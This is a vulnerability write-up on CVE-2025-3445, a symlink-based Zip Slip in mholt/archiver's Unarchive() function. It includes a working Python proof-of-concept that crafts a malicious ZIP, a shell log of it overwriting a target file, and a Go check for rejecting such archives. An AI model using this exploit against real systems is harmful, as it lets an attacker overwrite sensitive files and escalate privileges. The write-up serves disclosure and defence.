# CVE-2025-3445

Affected versions (>=3.0.0 <4.0.0-alpha.1) of this package (`mholt/archiver`) are vulnerable to Arbitrary File Write via Archive Extraction (**Zip** Slip) in the `Unarchive()` function. An attacker can overwrite sensitive files and potentially escalate privileges by supplying a malicious archive containing symlinks to an application that extracts it with the vulnerable function.

A very similar vulnerability was found in **TAR** files ([CVE-2024-0406](/notes/exploits-pocs/golang/mholt-archiver/cve-2024-0406.md)).

Although a fix was implemented, it hasn't been officially released, and the affected project has since been deprecated. The successor to `mholt/archiver` is a new project called `mholt/archives`, and its initial release (v0.1.0) removes the `Unarchive()` functionality.

***

### PoC || GTFO

```bash
» python3 cve-2025-3445.py /tmp/sessions/admin/fake_session
ZIP file created at cve-2025-3445.zip with symlink pointing to /tmp/sessions/admin/fake_session

# Upload the file to a target that uses the Unarchive() function

root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun  1 08:11 .
drwxr-xr-x 3 root root 4096 Jun  1 07:02 ..
lrwxrwxrwx 1 root root   32 Jun  1 08:11 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
```

```python
# cve-2025-3445.py
import sys
import zipfile

def create_zip(zip_path, symlink_target):
    with zipfile.ZipFile(zip_path, 'w') as zip_ref:
        # Entry 1: './x', stored with Unix symlink mode; its data is the link target
        symlink_info = zipfile.ZipInfo('./x')
        symlink_info.external_attr = 0o120777 << 16  # symlink type
        zip_ref.writestr(symlink_info, symlink_target)
        # Optional: write content to a normal file if needed
        # Entry 2: regular file 'x', the same path as './x' once normalized
        regular_file_content = b'<some-file-content-here>'
        zip_ref.writestr('x', regular_file_content)

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <symlink_target>")
        sys.exit(1)

    symlink_target = sys.argv[1]
    zip_path = "cve-2025-3445.zip"

    create_zip(zip_path, symlink_target)
    print(f"ZIP file created at {zip_path} with symlink pointing to {symlink_target}")
```
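Since no fixed release exists, an application that still calls `Unarchive()` can inspect an uploaded ZIP first and refuse the layout shown above. The following Go check is an added example, not code from mholt/archiver or from the PoC; `checkZip` and `sampleZip` are hypothetical names, the archive is constructed in memory, and the check also covers entries placed under a symlinked directory, which goes slightly beyond the single-file case on this page.

```go
package main

import (
	"archive/zip"
	"bytes"
	"fmt"
	"io/fs"
	"path"
	"strings"
)

// checkZip (hypothetical helper) flags symlink entries and entries at or under an earlier symlink entry's path.
func checkZip(zr *zip.Reader) []string {
	var links, findings []string
	for _, f := range zr.File {
		p := path.Clean(strings.ReplaceAll(f.Name, `\`, "/")) + "/" // "./x" and "x" both become "x/"
		for _, l := range links {
			if strings.HasPrefix(p, l) {
				findings = append(findings, f.Name+" resolves through earlier symlink entry "+l)
				break
			}
		}
		if f.Mode()&fs.ModeSymlink != 0 {
			links = append(links, p)
			findings = append(findings, "symlink entry: "+f.Name)
		}
	}
	return findings
}

// sampleZip builds a constructed in-memory archive; withLink adds a "./x" symlink entry before the regular "x".
func sampleZip(withLink bool) *zip.Reader {
	var buf bytes.Buffer
	zw := zip.NewWriter(&buf)
	if withLink {
		h := &zip.FileHeader{Name: "./x"}
		h.SetMode(fs.ModeSymlink | 0777)
		w, _ := zw.CreateHeader(h)
		w.Write([]byte("/tmp/placeholder-target")) // constructed link target
	}
	w, _ := zw.Create("x")
	w.Write([]byte("constructed content"))
	zw.Close()
	zr, _ := zip.NewReader(bytes.NewReader(buf.Bytes()), int64(buf.Len()))
	return zr
}

func main() {
	fmt.Println(checkZip(sampleZip(true)))
}
```

An upload handler would reject the archive whenever the returned slice is non-empty, before any entry is written to disk.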

